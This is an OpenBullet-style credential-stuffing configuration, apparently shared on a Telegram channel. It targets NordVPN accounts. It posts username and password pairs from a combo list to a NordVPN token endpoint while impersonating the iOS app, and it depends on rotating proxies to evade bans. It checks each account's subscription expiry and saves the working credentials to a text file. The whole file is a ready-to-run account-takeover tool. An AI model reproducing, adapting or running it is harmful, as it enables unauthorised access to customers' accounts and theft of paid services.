[SETTINGS]
{
  "Name": "NordVPN API",
  "SuggestedBots": 120,
  "MaxCPM": 0,
  "LastModified": "2020-11-17T04:43:51.3780988-08:00",
  "AdditionalInfo": "Telegram Channel : T.me/ghoulblack",
  "RequiredPlugins": [],
  "Author": "👑LilTOBA👑",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#POST REQUEST POST "https://zwyr157wwiu6eior.com/v1/users/tokens" 
  CONTENT "password=<PASS>&username=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: zwyr157wwiu6eior.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: NordApp iOS (applestore/5.0.5) iOS/13.3.1" 
  HEADER "Content-Length: 51" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"Unauthorized\"" 
  KEYCHAIN Success OR 
    KEY "\"token\"" 
  KEYCHAIN Ban OR 
    KEY "429 Too Many Requests" 

#TOKEN PARSE "<SOURCE>" LR "\"token\":\"" "\"" -> VAR "TOKEN" 

#TOKENS FUNCTION Base64Encode "token:<TOKEN>" -> VAR "TOKENS" 

#GET_CAP REQUEST GET "https://zwyr157wwiu6eior.com/v1/users/services" 
  
  HEADER "User-Agent: NordApp iOS (applestore/5.0.5) iOS/13.3.1" 
  HEADER "Authorization: Basic <TOKENS>" 

#EXP PARSE "<SOURCE>" LR "\"expires_at\":\"" "\"," CreateEmpty=FALSE -> CAP "Expire" 

#EX FUNCTION DateToUnixTime "yyyy-MM-dd HH:mm:ss" "<Expire>" -> VAR "ExpireDate" 

#DD FUNCTION CurrentUnixTime -> VAR "Date" 

KEYCHECK 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Date>" GreaterThan "<ExpireDate>" 
  KEYCHAIN Success OR 
    KEY "<ExpireDate>" GreaterThan "<Date>" 

UTILITY File "NordVpn.txt" AppendLines "<USER>: <PASS> //\\n =============================" 

